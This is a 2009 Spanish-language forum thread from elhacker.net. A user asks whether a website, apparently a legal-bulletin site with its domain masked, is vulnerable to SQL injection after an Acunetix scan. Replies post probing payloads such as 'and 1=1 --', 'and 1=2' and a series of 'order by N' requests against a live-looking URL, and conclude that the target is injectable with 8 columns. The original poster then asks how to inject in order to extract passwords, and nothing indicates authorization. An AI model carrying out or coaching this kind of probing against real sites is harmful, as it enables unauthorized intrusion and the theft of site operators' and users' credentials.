elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Arreglado, de nuevo, el registro del warzone (wargame) de EHN


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  Inyeccion SQL, ¿es vulnerable esta web?
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Inyeccion SQL, ¿es vulnerable esta web?  (Leído 5,782 veces)
y0mism0

Desconectado Desconectado

Mensajes: 238


Ver Perfil
Inyeccion SQL, ¿es vulnerable esta web?
« en: 28 Agosto 2009, 03:35 am »

Resulta que estaba escaneando una web con el acunetix y me salto esta supuesta vulnerablidad SQL en esta variable:

****/?op=Leyes&idBoletin=111-222-1933email@address.tst

El servidor me da el siguiente mensaje de error:

No se ha podido realizar la consulta: select * from leyes where id_publiOficial = 111-222-1933email@address.tst order by fecha desc; Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '@address.tst order by fecha desc' at line 1

De hay solo saco que hay una tabla llamada leyes y una columna llamada oficina.

Y ahora intento sacar las datos usando lo tipico, el having 1=1-- primero, dejando la url asi:

****/?op=Leyes&idBoletin=111-222-1933email@address.tst'having 1=1--

Dandome el mismo mensaje de error pero añadiendo lo del having:

No se ha podido realizar la consulta: select * from leyes where id_publiOficial = 111-222-1933email@address.tst'having 1=1-- order by fecha desc; Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '@address.tst order by fecha desc' at line 1

Luego lo puse asi: ****/?op='having 1=1--

Y no me salio ningun mensaje de error...

Tambien probe con 2 comillas, con otras instrucciones, ¿es este sitio vulnerable? ¿Tengo que meter el having de otra manera?

Da mensajes de error, pero no te deja meter las comillas para hacer la inyeccion, las toma como un caracter mas me parece.

Gracias
En línea

YST


Desconectado Desconectado

Mensajes: 965


I'm you


Ver Perfil WWW
Re: Inyeccion SQL, ¿es vulnerable esta web?
« Respuesta #1 en: 28 Agosto 2009, 04:10 am »

Prueba con
Código:
+and+1=1+--+
o
Prueba con
Código:
'+and+1=1+--+
En línea



Yo le enseñe a Kayser a usar objetos en ASM
WHK
Moderador Global
***
Desconectado Desconectado

Mensajes: 6.605


Sin conocimiento no hay espíritu


Ver Perfil WWW
Re: Inyeccion SQL, ¿es vulnerable esta web?
« Respuesta #2 en: 28 Agosto 2009, 04:23 am »

lo que pasa esque idBoletin contiene un valor incorrecto y por eso cada ves que haces pruebas con ese valor te arroja error.

Error:
***** index.php?op=InfoLey&idLey=6147 and 1=2

No da error:
***** index.php?op=InfoLey&idLey=6147 and 1=1

No da error
***** index.php?op=InfoLey&idLey=6147 order by 6

No da error
***** index.php?op=InfoLey&idLey=6147 order by 7

No da error
***** index.php?op=InfoLey&idLey=6147 order by 8

da error
***** index.php?op=InfoLey&idLey=6147 order by 9

Entonces es una tabla de 8 columnas que si tiene inyección sql.
En línea

y0mism0

Desconectado Desconectado

Mensajes: 238


Ver Perfil
Re: Inyeccion SQL, ¿es vulnerable esta web?
« Respuesta #3 en: 30 Agosto 2009, 03:30 am »

lo que pasa esque idBoletin contiene un valor incorrecto y por eso cada ves que haces pruebas con ese valor te arroja error.

Error:
***** index.php?op=InfoLey&idLey=6147 and 1=2

No da error:
***** index.php?op=InfoLey&idLey=6147 and 1=1

No da error
***** index.php?op=InfoLey&idLey=6147 order by 6

No da error
***** index.php?op=InfoLey&idLey=6147 order by 7

No da error
***** index.php?op=InfoLey&idLey=6147 order by 8

da error
***** index.php?op=InfoLey&idLey=6147 order by 9

Entonces es una tabla de 8 columnas que si tiene inyección sql.

Pues en la variables esta: ****/?op=Leyes&idBoletin
que yo te puse no funciona lo de 1=1 o 1=2 ni el order by...

¿pero como se puede hacer la inyeccion para sacar los pass? No te da errores que te vayan diciendo el nombre de las tablas ni los campos usando union select y todo eso.


En línea

YST


Desconectado Desconectado

Mensajes: 965


I'm you


Ver Perfil WWW
Re: Inyeccion SQL, ¿es vulnerable esta web?
« Respuesta #4 en: 30 Agosto 2009, 05:43 am »

La inyeccion para sacar claves de algun panel o algo varia según las tablas y columnas :P , tambien puede existir la posibilidad que no tenga en la MySQL los datos del login ;) .

Saludos
En línea



Yo le enseñe a Kayser a usar objetos en ASM
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
cómo poner mi pagina vulnerable para una inyeccion sql « 1 2 »
Desarrollo Web
jhonatanAsm 11 9,576 Último mensaje 4 Noviembre 2011, 14:54 pm
por jhonatanAsm
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines